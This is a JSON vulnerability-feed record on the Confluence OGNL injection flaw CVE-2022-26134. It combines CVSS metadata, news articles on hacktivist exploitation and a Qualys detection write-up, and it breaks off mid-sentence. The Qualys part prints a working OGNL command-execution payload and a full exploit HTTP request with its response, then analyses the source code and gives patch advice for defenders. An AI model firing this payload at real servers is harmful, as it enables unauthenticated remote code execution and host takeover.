{"ubuntucve": [{"lastseen": "2022-08-04T13:08:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL\ninjection vulnerability exists that would allow an unauthenticated attacker\nto execute arbitrary code on a Confluence Server or Data Center instance.\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before\n7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0\nbefore 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T00:00:00", "id": "UB:CVE-2022-26134", "href": "https://ubuntu.com/security/CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T10:28:56", "description": "Threat actors are using public exploits to pummel a critical zero-day remote code execution (RCE) flaw that affects all versions of a popular collaboration tool used in cloud and hybrid server environments and allows for complete host takeover.\n\nResearchers from Volexity uncovered the flaw in Atlassian Confluence Server and Data Center software over the Memorial Day weekend after they detected suspicious activity on two internet-facing web servers belonging to a customer running the software, they said in a [blog post](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) published last week.\n\n\u201cThe file was a well-known copy of the JSP variant of the China Chopper webshell,\u201d researchers wrote. \u201cHowever, a review of the web logs showed that the file had barely been accessed. The webshell appears to have been written as a means of secondary access.\u201d\n\nAtlassian released a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) the same day that Volexity went public with the flaw, warning customers that all supported version of Confluence Server and Data Center after version 1.3.0 were affected and that no updates were available. This prompted the U.S. Department of Homeland Security\u2019s Cybersecurity and Infrastructure Agency (CISA) to issue [a warning of its own](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) about the flaw.\n\nA day later, Atlassian released an update that fixes the following versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it\u2019s also strongly recommending that customers update as soon as they can. If that\u2019s not possible, the company provided in the advisory what it stressed is a \u201ctemporary\u201d workaround for the flaw by updating a list of specific files that correspond to specific versions of the product.\n\n## Threat Escalation\n\nIn the meantime, the situation is escalating quickly into one that security professionals said could reach epic proportions, with exploits surfacing daily and hundreds of unique IP addresses already throttling the vulnerability. Many versions of the affected products also remain unpatched, which also creates a dangerous situation.\n\n\u201cCVE-2022-26134 is about as bad as it gets,\u201d observed Naveen Sunkavalley, chief architect of security firm [Horizon3.ai](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUST9fX64-2FX7G8oio3HdExkfpXlsDdy0DMjoZZzh-2Fv3fxrEs2_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6Vxrf5tVuwdy9pbRo-2F8DNNu3J5mzixD3PJS7t4Hs2TYsOWw0ryNyw1-2BF9EHtf5wuqbWsxGPMD6EQsD7Nyoevetefkt7MGs-2FHajCJChJ0WWQ-2F4es5VBDN8zEwARSv6a1s6u74AUhwTSDRHOo3PP1Q1lKsA-3D>), in an email to Threatpost. Key issues are that the vulnerability is quite easy both to find and exploit, with the latter possible using a single HTTP GET request, he said.\n\nMoreover, the public exploits recently released that allow attackers to use the flaw to enable arbitrary command execution and take over the host against a number of Confluence versions\u2014including the latest unpatched version, 7.18.0, according to tests that Horizon3.ai has conducted, Sunkavaley said.\n\nIndeed, Twitter was blowing up over the past weekend with discussions about public exploits for the vulnerability. On Saturday, Andrew Morris, the CEO of cybersecurity firm [GreyNoise](<https://www.greynoise.io/>)[ tweeted](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZeLQXFApkVnt0p2uzldsLzexNPwWwME1VqzuxM4EPRfjhNCvLBy4YB49i5LBdhVDdk3bdxl9mMqYmby3BCNH00GddZh2Met-2FQVciEWaSqj2-2BDc33IvotYb-2FqKipRNwgEsWia58Lavv8WM5npBgeBdYkvQQSrhYbzaBUUuVaSV4Rk2ztpg8TXpsMCaYdZzeKKPgLWVToUg5Ht0f9g7gPwMwtAvcwxVmnWEDON1KFUmdHIfQ-2FKAQvcO7jS7WvGtrxWKAF52KobJgne5rQpdjvE11Y-2B8djmGzI1Q21AzX5T50A9-2BpHIOYzyAUqoUEWZpFnRzzLqrMu3icBZ57LmFKNxGTRPimDUjR7T8eDeQjnWttOekKn_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxpsA5L19rY7-2Fmx-2BEGIHXPubRKCQX-2B7BpbJqtYfPildu8zaULbUO4ygo24RQuqSIch-2BeFoJjwkkjlXG4ACkLuxahlCVA2m3cewG-2B9vzjCwKJ7F5JEpNGn-2FjGZEpkypXKWLD-2BIhk5XHKrarqem-2FZDDkHA-3D>) that they had begun to see 23 unique IP addresses exploiting the Atlassian vulnerabilities. On Monday, Morris [tweeted again](<https://twitter.com/Andrew___Morris/status/1533504231876993025>) that the number of unique IP addresses attempting to exploit the flaw had risen to 400 in just a 24-hour period.\n\n## **Potential for a SolarWinds 2.0?**\n\nSunkavalley pointed out that the most obvious impact of the vulnerability is that attackers can easily compromise public-facing Confluence instances to gain a foothold into internal networks, and then proceed from there to unleash even further damage.\n\n\u201cConfluence instances often contain a wealth of user data and business-critical information that is valuable for attackers moving laterally within internal networks,\u201d Sunkavalley said.\n\nWhat\u2019s more, the vulnerability is a source-code issue, and attacks at this level \u201care some of the most effective and long reaching attacks on the IT ecosystem,\u201d observed Garret Grajek, CEO of security firm [YouAttest.](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUcpjElsOr6shryTSooYkkS1tJo6a6FxvdH5IYSQBxGNY4H_z_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxtVZHvCB0Vt7i-2Bw8BIBLgZxGqzVWH-2B5yvKoY-2FpPXxD7KFogqV9a0rRV2rH4Hj2p6StEDVbzSc-2FkJf66Q9LkeRnRg9qfA-2Fm-2FP06VV5XsA8rTwU9DmqJ3uYX6CQKoNXRKL350M-2FNS011olthdA2Jkl3v0-3D>)\n\nThe now-infamous [Solarwinds supply-chain attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that started in December 2020 and extended well [into 2021](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) was an example of the level of damage and magnitude of threat that embedded malware can have, and the Confluence bug has the potential to create a similar scenario, he said.\n\n\u201cBy attacking the source code base the hackers are able to manipulate the code to become, in fact, agents of the hacking enterprise, cryptographically registered as legitimate components on the IT system,\u201d Grajek said.\n\nFor this reason, it\u2019s \u201cimperative that enterprises review their code and most importantly the identities that have control of the source system, like Atlassian, to ensure restrictive and legitimate access to their vital code bases,\u201d he asserted.\n", "cvss3": {}, "published": "2022-06-07T11:21:47", "type": "threatpost", "title": "Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T11:21:47", "id": "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "href": "https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. The execution flows up to ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)` where [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls` [translateVariables](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>)` method from [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class ` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)` which appears to be sink where the OGNL expression evaluation takes place invoking [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method from `OgnlValueStack` class `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)` and goes forward parsing the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### Source Code Analysis\n\nTo have a better understanding of the execution flow of this RCE vulnerability, it's important that we dive into the source code of these classes:\n\nStarting off with [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\nThe `getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example : When a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` will consider everything before the last trailing slash as a namespace. Hence namespace `<RCE payload>` is created from the malicious requested URI.\n\nAs a result, the last trailing slash is an essential component for the exploit to work, if omitted the payload won\u2019t work.\n\nThis namespace is further utilized by `execute` method using `this.namespace` expression inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, `translateVariables` method from `TextParseUtil` class is called on `this.namespace` expression which converts all instances of `${...}` in expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nGoing forward with [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. Hence `\\\\` double backslash are used in above regex `\\\\$\\\\{([^}]*)\\\\}` to escape $, {, } characters.\n\nNext line `final Matcher m = p.matcher(expression);` uses matcher() method to search for the pattern in a string, for example : `${qualys.rce.payload}` pattern is created. \n\nFurther contents of round brackets are extracts from the regular expression `\\\\$\\\\{([^}]*)\\\\}` to match the expression using `final String g = m.group(1);` and pass it to `final Object o = stack.findValue(g);`\n\nAnd finally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker makes a malicious request URI `http://127.0.0.1:8090/${rce_payload}/`, first `${rce_payload}` gets translated into a namespace and then using` TextParseUtil.translateVariables` the payload is extracted and henceforth using `findValue` the OGNL expression `rce_payload` gets evaluated causing Remote Code Execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users shall see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using the Confluence application are strongly advised to upgrade their Confluence application to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later version to remediate CVE-2022-26134 vulnerability. More information regarding patching and workaround can be referred to [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\nConfluence Security Advisory**:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to** 